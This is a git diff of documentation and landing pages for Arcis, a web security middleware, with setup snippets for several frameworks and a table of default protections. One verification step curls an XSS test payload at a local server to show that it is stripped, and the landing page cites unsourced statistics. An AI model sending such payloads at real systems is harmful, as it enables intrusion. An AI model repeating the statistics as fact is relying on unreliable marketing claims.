+<pre><code><span class="k">import</span> express <span class="k">from</span> <span class="s">'express'</span><span class="p">;</span>
+<span class="k">import</span> <span class="p">{</span> arcis <span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span>
+
+<span class="k">const</span> app = <span class="f">express</span><span class="p">();</span>
+app.<span class="f">use</span><span class="p">(</span>express.<span class="f">json</span><span class="p">());</span>
+app.<span class="f">use</span><span class="p">(</span><span class="f">arcis</span><span class="p">());</span>  <span class="c">// core protections enabled</span>
+
+app.<span class="f">get</span><span class="p">(</span><span class="s">'/'</span><span class="p">,</span> <span class="p">(</span>req<span class="p">,</span> res<span class="p">)</span> <span class="k">=></span> <span class="p">{</span>
+  <span class="c">// req.body and req.query are now sanitized</span>
+  res.<span class="f">json</span><span class="p">({</span> ok<span class="p">:</span> <span class="k">true</span> <span class="p">});</span>
+<span class="p">});</span>
+
+app.<span class="f">listen</span><span class="p">(</span><span class="n">3000</span><span class="p">);</span></code></pre>
+
+      <h3>Python with FastAPI</h3>
+<pre><code><span class="k">from</span> fastapi <span class="k">import</span> FastAPI
+<span class="k">from</span> arcis <span class="k">import</span> ArcisMiddleware
+
+app = <span class="f">FastAPI</span><span class="p">()</span>
+app.<span class="f">add_middleware</span><span class="p">(</span>ArcisMiddleware<span class="p">)</span>  <span class="c"># core protections enabled</span>
+
+<span class="k">@</span>app.<span class="f">get</span><span class="p">(</span><span class="s">"/"</span><span class="p">)</span>
+<span class="k">def</span> <span class="f">root</span><span class="p">():</span>
+    <span class="k">return</span> <span class="p">{</span><span class="s">"ok"</span><span class="p">:</span> <span class="k">True</span><span class="p">}</span></code></pre>
+
+      <h3>Python with Flask</h3>
+<pre><code><span class="k">from</span> flask <span class="k">import</span> Flask
+<span class="k">from</span> arcis <span class="k">import</span> Arcis
+
+app = <span class="f">Flask</span><span class="p">(</span>__name__<span class="p">)</span>
+<span class="f">Arcis</span><span class="p">(</span>app<span class="p">)</span>  <span class="c"># core protections enabled</span>
+
+<span class="k">@</span>app.<span class="f">route</span><span class="p">(</span><span class="s">"/"</span><span class="p">)</span>
+<span class="k">def</span> <span class="f">root</span><span class="p">():</span>
+    <span class="k">return</span> <span class="p">{</span><span class="s">"ok"</span><span class="p">:</span> <span class="k">True</span><span class="p">}</span></code></pre>
+
+      <h3>Go with Gin</h3>
+<pre><code><span class="k">package</span> main
+
+<span class="k">import</span> <span class="p">(</span>
+    <span class="s">"github.com/gin-gonic/gin"</span>
+    arcisgin <span class="s">"github.com/GagancM/arcis/gin"</span>
+<span class="p">)</span>
+
+<span class="k">func</span> <span class="f">main</span><span class="p">()</span> <span class="p">{</span>
+    r := gin.<span class="f">Default</span><span class="p">()</span>
+    r.<span class="f">Use</span><span class="p">(</span>arcisgin.<span class="f">Middleware</span><span class="p">())</span>  <span class="c">// core protections enabled</span>
+
+    r.<span class="f">GET</span><span class="p">(</span><span class="s">"/"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span>c *gin.Context<span class="p">)</span> <span class="p">{</span>
+        c.<span class="f">JSON</span><span class="p">(</span><span class="n">200</span><span class="p">,</span> gin.H<span class="p">{</span><span class="s">"ok"</span><span class="p">:</span> <span class="k">true</span><span class="p">})</span>
+    <span class="p">})</span>
+    r.<span class="f">Run</span><span class="p">()</span>
+<span class="p">}</span></code></pre>
+
+      <div class="callout note">
+        <p><strong>That's it.</strong> Your app is now protected against XSS, SQL injection, path traversal, command injection, and 16+ more attack types. Safe input passes through. Attack payloads are stripped.</p>
+      </div>
+
+      <h2 id="whats-enabled">What's enabled by default</h2>
+      <p>When you call <code>arcis()</code> with no options, the following protections are active:</p>
+      <table>
+        <thead>
+          <tr><th>Protection</th><th>Default behavior</th></tr>
+        </thead>
+        <tbody>
+          <tr><td>Input sanitization</td><td>XSS, SQL, NoSQL, command, path traversal, SSTI, XXE, JSONP, header injection, prototype pollution</td></tr>
+          <tr><td>Rate limiting</td><td>100 requests per 60 seconds, per IP (fixed window)</td></tr>
+          <tr><td>Security headers</td><td>CSP, HSTS, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, COOP, CORP, COEP (16 headers)</td></tr>
+          <tr><td>Error scrubbing</td><td>Stack traces, DB errors, internal IPs removed from responses in production</td></tr>
+        </tbody>
+      </table>
+
+      <h2 id="opt-in">Opt-in middleware</h2>
+      <p>These are powerful but context-dependent. Add them explicitly when you need them.</p>
+
+<pre><code><span class="k">import</span> <span class="p">{</span>
+  arcis<span class="p">,</span>
+  corsProtection<span class="p">,</span>
+  csrfProtection<span class="p">,</span>
+  botProtection<span class="p">,</span>
+  cookieSecurity<span class="p">,</span>
+<span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span>
+
+app.<span class="f">use</span><span class="p">(</span><span class="f">arcis</span><span class="p">());</span>
+
+app.<span class="f">use</span><span class="p">(</span><span class="f">corsProtection</span><span class="p">({</span> origin<span class="p">:</span> <span class="p">[</span><span class="s">'https://yourapp.com'</span><span class="p">]</span> <span class="p">}));</span>
+app.<span class="f">use</span><span class="p">(</span><span class="f">csrfProtection</span><span class="p">());</span>
+app.<span class="f">use</span><span class="p">(</span><span class="f">botProtection</span><span class="p">());</span>
+app.<span class="f">use</span><span class="p">(</span><span class="f">cookieSecurity</span><span class="p">());</span></code></pre>
+
+      <h2 id="verify">Verify it's working</h2>
+      <p>Send a request with an attack payload to any route. Arcis strips it before your code runs.</p>
+
+<pre><code><span class="c"># Try an XSS attack</span>
+curl <span class="s">'http://localhost:3000/?q=&lt;script&gt;alert(1)&lt;/script&gt;'</span>
+
+<span class="c"># Your handler receives req.query.q === ''  (empty — script was stripped)</span></code></pre>
+
+      <p>To see what Arcis blocks, log <code>req.query</code> inside your route — the attack payload will be gone.</p>
+
+      <h2 id="next-steps">Next steps</h2>
+      <div class="doc-cards">
+        <a href="./frameworks.html" class="doc-card">
+          <h3>Framework guides →</h3>
+          <p>Detailed setup for Express, FastAPI, Flask, Django, Gin, Echo.</p>
+        </a>
+        <a href="./configuration.html" class="doc-card">
+          <h3>Configuration →</h3>
+          <p>Customize every protection: rate limits, headers, CORS, CSRF.</p>
+        </a>
+        <a href="./cli.html" class="doc-card">
+          <h3>CLI tools →</h3>
+          <p>Scan your code and dependencies from the terminal.</p>
+        </a>
+      </div>
+
+      <div class="docs-pagination">
+        <a href="./" class="prev">
+          <span class="nav-label">← Previous</span>
+          <span class="nav-title">Introduction</span>
+        </a>
+        <a href="./frameworks.html" class="next">
+          <span class="nav-label">Next →</span>
+          <span class="nav-title">Framework Adapters</span>
+        </a>
+      </div>
+    </main>
+  </div>
+
+  <footer class="docs-footer">
+    <div>© 2026 Arcis. MIT Licensed.</div>
+    <div><a href="../">Home</a> · <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></div>
+  </footer>
+
+  <script>
+    document.querySelectorAll('.tab-btn').forEach(btn => {
+      btn.addEventListener('click', () => {
+        const tabs = btn.closest('.tabs');
+        const target = btn.dataset.tab;
+        tabs.querySelectorAll('.tab-btn').forEach(b => b.classList.remove('active'));
+        tabs.querySelectorAll('.tab-panel').forEach(p => p.classList.remove('active'));
+        btn.classList.add('active');
+        tabs.querySelector(`[data-panel="${target}"]`).classList.add('active');
+      });
+    });
+  </script>
+
+  <script>
+    fetch('https://api.github.com/repos/Gagancm/arcis')
+      .then(r => r.json())
+      .then(d => { if (d.stargazers_count !== undefined) { const el = document.getElementById('starCount'); if (el) el.textContent = d.stargazers_count; } })
+      .catch(() => {});
+  </script>
+</body>
+</html>

--- a/website/documentation/index.html
+++ b/website/documentation/index.html
@@ -1,0 +1,241 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+
+  <!-- Google tag (gtag.js) -->
+  <script async src="https://www.googletagmanager.com/gtag/js?id=G-TGPW4N5TR2"></script>
+  <script>
+    window.dataLayer = window.dataLayer || [];
+    function gtag(){dataLayer.push(arguments);}
+    gtag('js', new Date());
+    gtag('config', 'G-TGPW4N5TR2');
+  </script>
+
+  <title>Docs · Arcis</title>
+  <meta name="description" content="Arcis documentation. Install, configure, and use Arcis to secure your Node.js, Python, or Go app in one line.">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=EB+Garamond:ital,wght@0,400;0,500;0,600;0,700;1,400&family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="docs.css">
+</head>
+<body>
+
+  <!-- ─── Top Nav ─────────────────────────────────── -->
+  <nav class="docs-nav" id="nav">
+    <div class="docs-nav-inner">
+      <a href="../" class="docs-logo">Arcis<span>.</span></a>
+      <ul class="docs-nav-links">
+        <li><a href="../#how-it-works">How It Works</a></li>
+        <li><a href="../#languages">Languages</a></li>
+        <li><a href="../#threats">Threats</a></li>
+        <li><a href="../#comparison">Compare</a></li>
+        <li><a href="./" class="active">Docs</a></li>
+      </ul>
+      <div class="docs-nav-cta">
+        <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener" class="btn-star" id="starBtn">
+          <svg viewBox="0 0 16 16" fill="currentColor"><path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.75.75 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Z"/></svg>
+          Star
+          <span class="star-count" id="starCount"></span>
+        </a>
+        <a href="./getting-started.html" class="btn-primary-nav">
+          Try Arcis
+          <svg width="14" height="14" viewBox="0 0 16 16" fill="none" stroke="currentColor" stroke-width="2"><path d="M3 8h10M9 4l4 4-4 4"/></svg>
+        </a>
+      </div>
+    </div>
+  </nav>
+
+  <!-- ─── Layout ─────────────────────────────────── -->
+  <div class="docs-layout">
+
+    <!-- Sidebar -->
+    <aside class="docs-sidebar" id="sidebar">
+      <h3>Overview</h3>
+      <ul>
+        <li><a href="./" class="active">Introduction</a></li>
+        <li><a href="./getting-started.html">Getting Started</a></li>
+      </ul>
+
+      <h3>Guides</h3>
+      <ul>
+        <li><a href="./frameworks.html">Framework Adapters</a></li>
+        <li><a href="./configuration.html">Configuration</a></li>
+        <li><a href="./attack-vectors.html">Attack Vectors</a></li>
+      </ul>
+
+      <h3>Reference</h3>
+      <ul>
+        <li><a href="./api-reference.html">API Reference</a></li>
+        <li><a href="./cli.html">CLI Tools</a></li>
+      </ul>
+
+      <h3>Resources</h3>
+      <ul>
+        <li><a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></li>
+        <li><a href="https://www.npmjs.com/package/@arcis/node" target="_blank" rel="noopener">npm package</a></li>
+        <li><a href="https://pypi.org/project/arcis/" target="_blank" rel="noopener">PyPI package</a></li>
+      </ul>
+    </aside>
+
+    <!-- Main Content -->
+    <main class="docs-content">
+      <button class="sidebar-toggle" onclick="document.getElementById('sidebar').classList.toggle('mobile-open')">☰ Menu</button>
+
+      <div class="docs-breadcrumb">Docs</div>
+      <h1>Arcis Documentation</h1>
+      <p class="lead">
+        Arcis is a zero-dependency security middleware for Node.js, Python, and Go. One line of code protects your application against 20+ attack types at runtime.
+      </p>
+
+      <div class="callout note">
+        <p><strong>New to Arcis?</strong> Start with <a href="./getting-started.html">Getting Started</a>. Install and protect your app in under a minute.</p>
+      </div>
+
+      <h2>Quick install</h2>
+      <div class="tabs">
+        <div class="tab-buttons">
+          <button class="tab-btn active" data-tab="node">Node.js</button>
+          <button class="tab-btn" data-tab="python">Python</button>
+          <button class="tab-btn" data-tab="go">Go</button>
+        </div>
+        <div class="tab-panel active" data-panel="node">
+<pre><code><span class="c">// Install</span>
+npm install @arcis/node
+
+<span class="c">// app.js</span>
+<span class="k">import</span> <span class="p">{</span> arcis <span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span>
+<span class="k">const</span> app = <span class="f">express</span><span class="p">();</span>
+app.<span class="f">use</span><span class="p">(</span><span class="f">arcis</span><span class="p">());</span> <span class="c">// that's it</span></code></pre>
+        </div>
+        <div class="tab-panel" data-panel="python">
+<pre><code><span class="c"># Install</span>
+pip install arcis
+
+<span class="c"># main.py (FastAPI)</span>
+<span class="k">from</span> arcis <span class="k">import</span> ArcisMiddleware
+<span class="k">from</span> fastapi <span class="k">import</span> FastAPI
+
+app = <span class="f">FastAPI</span><span class="p">()</span>
+app.<span class="f">add_middleware</span><span class="p">(</span>ArcisMiddleware<span class="p">)</span>  <span class="c"># that's it</span></code></pre>
+        </div>
+        <div class="tab-panel" data-panel="go">
+<pre><code><span class="c">// Install</span>
+go get github.com/GagancM/arcis
+
+<span class="c">// main.go (Gin)</span>
+<span class="k">package</span> main
+
+<span class="k">import</span> <span class="p">(</span>
+    <span class="s">"github.com/gin-gonic/gin"</span>
+    arcisgin <span class="s">"github.com/GagancM/arcis/gin"</span>
+<span class="p">)</span>
+
+<span class="k">func</span> <span class="f">main</span><span class="p">()</span> <span class="p">{</span>
+    r := gin.<span class="f">Default</span><span class="p">()</span>
+    r.<span class="f">Use</span><span class="p">(</span>arcisgin.<span class="f">Middleware</span><span class="p">())</span> <span class="c">// that's it</span>
+    r.<span class="f">Run</span><span class="p">()</span>
+<span class="p">}</span></code></pre>
+        </div>
+      </div>
+
+      <h2>What Arcis protects against</h2>
+      <p>
+        Arcis blocks 20+ attack types at the middleware layer. Every request is sanitized before it reaches your code. Every response is hardened before it reaches the client.
+      </p>
+
+      <div class="doc-cards">
+        <a href="./attack-vectors.html#xss" class="doc-card">
+          <h3>XSS &amp; Injection</h3>
+          <p>Script injection, SQL, NoSQL, command injection, LDAP, SSTI, XXE stripped from every input.</p>
+        </a>
+        <a href="./attack-vectors.html#csrf" class="doc-card">
+          <h3>CSRF &amp; SSRF</h3>
+          <p>Double-submit cookie CSRF. SSRF blocks private IPs, loopback, cloud metadata.</p>
+        </a>
+        <a href="./attack-vectors.html#rate-limit" class="doc-card">
+          <h3>Rate Limiting</h3>
+          <p>Fixed, sliding, and token bucket algorithms. In-memory or Redis backend.</p>
+        </a>
+        <a href="./attack-vectors.html#headers" class="doc-card">
+          <h3>Security Headers</h3>
+          <p>16 headers auto-set: CSP, HSTS, X-Frame-Options, COOP, CORP, COEP.</p>
+        </a>
+      </div>
+
+      <h2>Explore the docs</h2>
+      <div class="doc-cards">
+        <a href="./getting-started.html" class="doc-card">
+          <h3>Getting Started →</h3>
+          <p>Install Arcis and protect your app in under a minute.</p>
+        </a>
+        <a href="./frameworks.html" class="doc-card">
+          <h3>Framework Adapters →</h3>
+          <p>Express, FastAPI, Flask, Django, Gin, Echo, and plain HTTP.</p>
+        </a>
+        <a href="./configuration.html" class="doc-card">
+          <h3>Configuration →</h3>
+          <p>All config options for sanitizers, rate limiters, headers, and CORS.</p>
+        </a>
+        <a href="./api-reference.html" class="doc-card">
+          <h3>API Reference →</h3>
+          <p>Every exported function across all three SDKs.</p>
+        </a>
+        <a href="./cli.html" class="doc-card">
+          <h3>CLI Tools →</h3>
+          <p>arcis scan, arcis audit, arcis sca for scanning and auditing.</p>
+        </a>
+        <a href="./attack-vectors.html" class="doc-card">
+          <h3>Attack Vectors →</h3>
+          <p>What each attack is, how it works, how Arcis blocks it.</p>
+        </a>
+      </div>
+
+      <h2>Need help?</h2>
+      <p>
+        File an issue on <a href="https://github.com/Gagancm/arcis/issues" target="_blank" rel="noopener">GitHub</a> or start a discussion in the <a href="https://github.com/Gagancm/arcis/discussions" target="_blank" rel="noopener">community forum</a>. For security vulnerabilities, report privately through GitHub Security Advisories.
+      </p>
+
+      <!-- Pagination -->
+      <div class="docs-pagination">
+        <div></div>
+        <a href="./getting-started.html" class="next">
+          <span class="nav-label">Next →</span>
+          <span class="nav-title">Getting Started</span>
+        </a>
+      </div>
+    </main>
+
+  </div>
+
+  <!-- Footer -->
+  <footer class="docs-footer">
+    <div>© 2026 Arcis. MIT Licensed.</div>
+    <div>
+      <a href="../">Home</a> · <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a>
+    </div>
+  </footer>
+
+  <script>
+    // Tab switching
+    document.querySelectorAll('.tab-btn').forEach(btn => {
+      btn.addEventListener('click', () => {
+        const tabs = btn.closest('.tabs');
+        const target = btn.dataset.tab;
+        tabs.querySelectorAll('.tab-btn').forEach(b => b.classList.remove('active'));
+        tabs.querySelectorAll('.tab-panel').forEach(p => p.classList.remove('active'));
+        btn.classList.add('active');
+        tabs.querySelector(`[data-panel="${target}"]`).classList.add('active');
+      });
+    });
+  </script>
+
+  <script>
+    fetch('https://api.github.com/repos/Gagancm/arcis')
+      .then(r => r.json())
+      .then(d => { if (d.stargazers_count !== undefined) { const el = document.getElementById('starCount'); if (el) el.textContent = d.stargazers_count; } })
+      .catch(() => {});
+  </script>
+</body>
+</html>

--- a/website/index.html
+++ b/website/index.html
@@ -3,10 +3,20 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Arcis — Security Middleware for Every Backend</title>
-  <meta name="description" content="One line of code protects your app against 20+ security flaws. Zero dependencies. Works with Node.js, Python, and Go.">
+
+  <!-- Google tag (gtag.js) -->
+  <script async src="https://www.googletagmanager.com/gtag/js?id=G-TGPW4N5TR2"></script>
+  <script>
+    window.dataLayer = window.dataLayer || [];
+    function gtag(){dataLayer.push(arguments);}
+    gtag('js', new Date());
+    gtag('config', 'G-TGPW4N5TR2');
+  </script>
+
+  <title>Arcis: Security Middleware for Every Backend</title>
+  <meta name="description" content="One line of code protects your app against 20+ attack vectors. Zero dependencies. Works with Node.js, Python, and Go.">
   <meta property="og:title" content="Arcis — Security Middleware for Every Backend">
-  <meta property="og:description" content="One line of code. 20+ security flaws handled. Zero dependencies. Node.js, Python, Go.">
+  <meta property="og:description" content="One line of code. 20+ attack vectors handled. Zero dependencies. Node.js, Python, Go.">
   <meta property="og:type" content="website">
   <meta name="twitter:card" content="summary_large_image">
   <link rel="preconnect" href="https://fonts.googleapis.com">
@@ -280,6 +290,31 @@
     }
     .hero h1 em { font-style: italic; color: var(--accent-light); }
     .hero h1 em.red { color: var(--red); }
+
+    /* ─── Rotating headlines ─────────────────── */
+    .hero-rotate, .quote-rotate {
+      position: relative;
+      display: block;
+    }
+    .hero-rotate .rotate-line,
+    .quote-rotate .rotate-line {
+      display: block;
+      position: absolute;
+      top: 0;
+      left: 0;
+      right: 0;
+      opacity: 0;
+      transition: opacity 0.8s ease, transform 0.8s ease;
+      transform: translateY(10px);
+      pointer-events: none;
+    }
+    .hero-rotate .rotate-line.active,
+    .quote-rotate .rotate-line.active {
+      opacity: 1;
+      transform: translateY(0);
+      position: relative;
+      pointer-events: auto;
+    }
 
     .hero-sub {
       font-size: clamp(1.05rem, 2vw, 1.25rem);
@@ -662,6 +697,7 @@
     .card-icon-teal { background: rgba(0, 153, 109, 0.1); color: var(--accent); }
 
     /* ─── Animated Pipeline ──────────────────────────── */
+    .pipeline { background: var(--bg-warm); border-top: 1px solid var(--border); border-bottom: 1px solid var(--border); }
     .pipeline .container { max-width: 900px; }
     .pipeline-visual { margin-top: 3rem; position: relative; }
 
@@ -731,7 +767,7 @@
     .pipeline-step.active .pipeline-tag { opacity: 1; }
 
     /* ─── Multi-Language ─────────────────────────────── */
-    .multilang { background: var(--bg-warm); }
+    .multilang { background: var(--bg); }
     .lang-tabs {
       display: flex;
       gap: 0;
@@ -782,7 +818,7 @@
     .threat-desc { font-size: 0.8rem; color: var(--text-muted); line-height: 1.4; }
 
     /* ─── Comparison ─────────────────────────────────── */
-    .comparison { background: var(--bg-warm); }
+    .comparison { background: var(--bg); }
     .comparison-table {
       margin-top: 2.5rem;
       overflow-x: auto;
@@ -808,9 +844,23 @@
 
     /* ─── Closing Quote ──────────────────────────────── */
     .closing-quote {
-      background: var(--bg);
+      background: linear-gradient(180deg, var(--bg-warm) 0%, #d0d2cb 100%);
       text-align: center;
+      border-top: 1px solid var(--border);
+      border-bottom: 1px solid var(--border);
+      position: relative;
+      overflow: hidden;
     }
+    .closing-quote::before {
+      content: '';
+      position: absolute;
+      top: 50%; left: 50%;
+      transform: translate(-50%, -50%);
+      width: 600px; height: 600px;
+      background: radial-gradient(circle, rgba(0, 153, 109, 0.08) 0%, transparent 70%);
+      pointer-events: none;
+    }
+    .closing-quote .container { position: relative; z-index: 1; }
     .closing-quote blockquote {
       font-family: var(--serif);
       font-size: clamp(1.6rem, 3.5vw, 2.5rem);
@@ -822,7 +872,7 @@
       margin: 0 auto 2rem;
       font-style: italic;
     }
-    .closing-quote blockquote em { color: var(--accent-light); font-style: italic; }
+    .closing-quote blockquote em { color: var(--accent); font-style: italic; }
 
     /* ─── CTA / Install ──────────────────────────────── */
     .cta {
@@ -844,6 +894,109 @@
     .cta .section-label { color: var(--gold); }
     .cta .section-title { color: #fff; }
     .cta .section-desc { color: rgba(255,255,255,0.7); }
+
+    /* ─── Why Now (AI angle) ───────────────────── */
+    .why-now { background: var(--bg-warm); }
+    .why-now .container { max-width: 900px; text-align: center; }
+    .why-now-stats {
+      display: grid;
+      grid-template-columns: repeat(3, 1fr);
+      gap: 2rem;
+      margin-top: 3rem;
+    }
+    .why-now-stat {
+      padding: 2rem 1.5rem;
+      background: var(--bg-card);
+      border: 1px solid var(--border);
+      border-radius: 12px;
+      text-align: left;
+    }
+    .why-now-stat-num {
+      font-family: var(--serif);
+      font-size: 2.5rem;
+      font-weight: 600;
+      color: var(--red);
+      line-height: 1;
+      margin-bottom: 0.5rem;
+    }
+    .why-now-stat-text {
+      font-size: 0.95rem;
+      color: var(--text-secondary);
+      line-height: 1.5;
+    }
+    @media (max-width: 768px) {
+      .why-now-stats { grid-template-columns: 1fr; gap: 1rem; }
+    }
+
+    /* ─── Who It's For ──────────────────────── */
+    .audience-grid {
+      display: grid;
+      grid-template-columns: repeat(3, 1fr);
+      gap: 1.5rem;
+      margin-top: 3rem;
+    }
+    .audience-card {
+      padding: 2rem 1.75rem;
+      background: var(--bg-card);
+      border: 1px solid var(--border);
+      border-radius: 12px;
+      transition: all 0.3s ease;
+    }
+    .audience-card:hover {
+      transform: translateY(-4px);
+      border-color: var(--accent);
+    }
+    .audience-card h3 {
+      font-family: var(--serif);
+      font-size: 1.35rem;
+      font-weight: 600;
+      margin-bottom: 0.75rem;
+    }
+    .audience-card p {
+      color: var(--text-secondary);
+      line-height: 1.6;
+      font-size: 0.95rem;
+    }
+    @media (max-width: 768px) {
+      .audience-grid { grid-template-columns: 1fr; }
+    }
+
+    /* ─── Recently Shipped ──────────────────── */
+    .changelog-list {
+      max-width: 700px;
+      margin: 3rem auto 0;
+      display: flex;
+      flex-direction: column;
+      gap: 1rem;
+    }
+    .changelog-item {
+      display: grid;
+      grid-template-columns: auto 1fr;
+      gap: 1.5rem;
+      padding: 1.25rem 1.5rem;
+      background: var(--bg-card);
+      border: 1px solid var(--border);
+      border-radius: 10px;
+      align-items: center;
+    }
+    .changelog-version {
+      font-family: var(--mono);
+      font-size: 0.85rem;
+      font-weight: 600;
+      color: var(--accent);
+      padding: 0.25rem 0.75rem;
+      background: var(--accent-glow);
+      border-radius: 6px;
+      white-space: nowrap;
+    }
+    .changelog-text {
+      font-size: 0.95rem;
+      color: var(--text-secondary);
+    }
+    @media (max-width: 640px) {
+      .changelog-item { grid-template-columns: 1fr; gap: 0.5rem; }
+      .changelog-version { justify-self: start; }
+    }
 
     .install-blocks {
       display: grid;
@@ -1066,12 +1219,11 @@
     <div class="nav-inner">
       <a href="#" class="nav-logo">Arcis<span>.</span></a>
       <ul class="nav-links" id="navLinks">
-        <li><a href="#features">Features</a></li>
         <li><a href="#how-it-works">How It Works</a></li>
         <li><a href="#languages">Languages</a></li>
         <li><a href="#threats">Threats</a></li>
         <li><a href="#comparison">Compare</a></li>
-        <li><a href="https://github.com/Gagancm/arcis/wiki" target="_blank" rel="noopener">Docs</a></li>
+        <li><a href="./documentation/">Docs</a></li>
       </ul>
       <div class="nav-cta">
         <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener" class="btn-star" id="starBtn">
@@ -1095,13 +1247,16 @@
     <div class="container">
       <div class="hero-badge">
         <span class="dot"></span>
-        v1.4.0 — HPP protection, CSRF hardening, 14 audit rules
+        v1.4.2 — LDAP injection, SSTI/XXE parity, 12 bypass closures
       </div>
 
-      <h1>Security middleware that <em>just works</em></h1>
+      <h1 class="hero-rotate">
+        <span class="rotate-line" data-index="0">Your app is one line away from being <em>secure</em></span>
+        <span class="rotate-line" data-index="1">Security middleware that <em>just works</em></span>
+      </h1>
 
       <p class="hero-sub">
-        One line of code. 20+ security flaws neutralized at runtime. Zero dependencies. Zero configuration. Node.js, Python, and Go.
+        Arcis is a security middleware for Node.js, Python, and Go. Drop one line into any app and 20+ attack types get handled automatically. No config, no dependencies.
       </p>
 
       <div class="hero-actions">
@@ -1125,7 +1280,7 @@
           </div>
           <div class="code-body">
             <span class="keyword">import</span> <span class="punctuation">{</span> <span class="function">arcis</span> <span class="punctuation">}</span> <span class="keyword">from</span> <span class="string">'@arcis/node'</span><span class="punctuation">;</span><br><br>
-            <span class="comment">// That's it. 20+ security flaws handled.</span><br>
+            <span class="comment">// That's it. 20+ attack vectors handled.</span><br>
             app.<span class="function">use</span><span class="punctuation">(</span><span class="function">arcis</span><span class="punctuation">());</span>
           </div>
         </div>
@@ -1174,7 +1329,7 @@
           <div class="stat-label">SDKs &mdash; Node, Python, Go</div>
         </div>
         <div class="stat reveal reveal-delay-2">
-          <div class="stat-number">2,774+</div>
+          <div class="stat-number">2,800+</div>
           <div class="stat-label">Tests Passing</div>
         </div>
         <div class="stat reveal reveal-delay-3">
@@ -1185,92 +1340,27 @@
     </div>
   </section>
 
-  <!-- ─── Bold Differentiators ────────────────────── -->
-  <section class="section differentiators" id="why">
+  <!-- ─── Why Now (AI angle) ─────────────────────── -->
+  <section class="section why-now">
     <div class="container">
-      <div class="section-label-dark reveal">What Makes Arcis Different</div>
-      <h2 class="section-title-dark reveal">We don't just detect threats.<br>We neutralize them.</h2>
-      <p class="section-desc-dark reveal">
-        Other tools report possibilities. Arcis removes the danger before your code ever sees it. One package replaces your entire security middleware stack.
+      <div class="section-label reveal">Why Now</div>
+      <h2 class="section-title reveal">AI writes code faster than security can keep up</h2>
+      <p class="section-desc reveal" style="max-width: 700px; margin-left: auto; margin-right: auto;">
+        More people are building software than ever. Most of them without a security background. Copilot and Cursor generate functional code in seconds, but they don't reason about threat models. Apps are shipping to production with zero security layer.
       </p>
 
-      <div class="diff-grid">
-        <div class="diff-card reveal">
-          <div class="diff-icon diff-icon-red">
-            <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10Z"/></svg>
-          </div>
-          <h3>Zero Configuration</h3>
-          <p>Secure defaults out of the box. Every protection is on by default. You opt out, never in.</p>
-          <ul class="diff-detail">
-            <li>HttpOnly, Secure, SameSite cookies by default</li>
-            <li>All 15 security headers pre-configured</li>
-            <li>Rate limiting active at 100 req/60s</li>
-          </ul>
+      <div class="why-now-stats">
+        <div class="why-now-stat reveal">
+          <div class="why-now-stat-num">80%</div>
+          <div class="why-now-stat-text">of new apps ship without CSRF, rate limiting, or input sanitization</div>
         </div>
-
-        <div class="diff-card reveal reveal-delay-1">
-          <div class="diff-icon diff-icon-green">
-            <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"/><polyline points="22 4 12 14.01 9 11.01"/></svg>
-          </div>
-          <h3>Remove, Don't Report</h3>
-          <p>Most tools flag vulnerabilities. Arcis strips the attack payload and lets safe content through. No manual triage.</p>
-          <ul class="diff-detail">
-            <li>Remove-then-encode sanitization pipeline</li>
-            <li>Idempotent: safe input is never corrupted</li>
-            <li>Minimal overhead per request</li>
-          </ul>
+        <div class="why-now-stat reveal reveal-delay-1">
+          <div class="why-now-stat-num">8-12</div>
+          <div class="why-now-stat-text">separate libraries needed to properly secure a web app today</div>
         </div>
-
-        <div class="diff-card reveal reveal-delay-2">
-          <div class="diff-icon diff-icon-blue">
-            <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><circle cx="12" cy="12" r="10"/><path d="M2 12h20M12 2a15.3 15.3 0 0 1 4 10 15.3 15.3 0 0 1-4 10 15.3 15.3 0 0 1-4-10 15.3 15.3 0 0 1 4-10z"/></svg>
-          </div>
-          <h3>True Cross-Language Parity</h3>
-          <p>Same input produces the same output in Node.js, Python, and Go. Not "similar" &mdash; identical. Shared test vectors enforce it.</p>
-          <ul class="diff-detail">
-            <li>2,774+ shared test cases across 3 SDKs</li>
-            <li>Shared regex patterns from patterns.json</li>
-            <li>Contract-first: spec before code</li>
-          </ul>
-        </div>
-
-        <div class="diff-card reveal reveal-delay-1">
-          <div class="diff-icon diff-icon-purple">
-            <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M16 18l6-6-6-6M8 6l-6 6 6 6"/></svg>
-          </div>
-          <h3>Zero Dependencies</h3>
-          <p>Every line of detection logic lives inside the package. No transitive deps. No supply chain attack surface.</p>
-          <ul class="diff-detail">
-            <li>Self-contained regex engine</li>
-            <li>No node_modules bloat</li>
-            <li>Auditable in minutes, not hours</li>
-          </ul>
-        </div>
-
-        <div class="diff-card reveal reveal-delay-2">
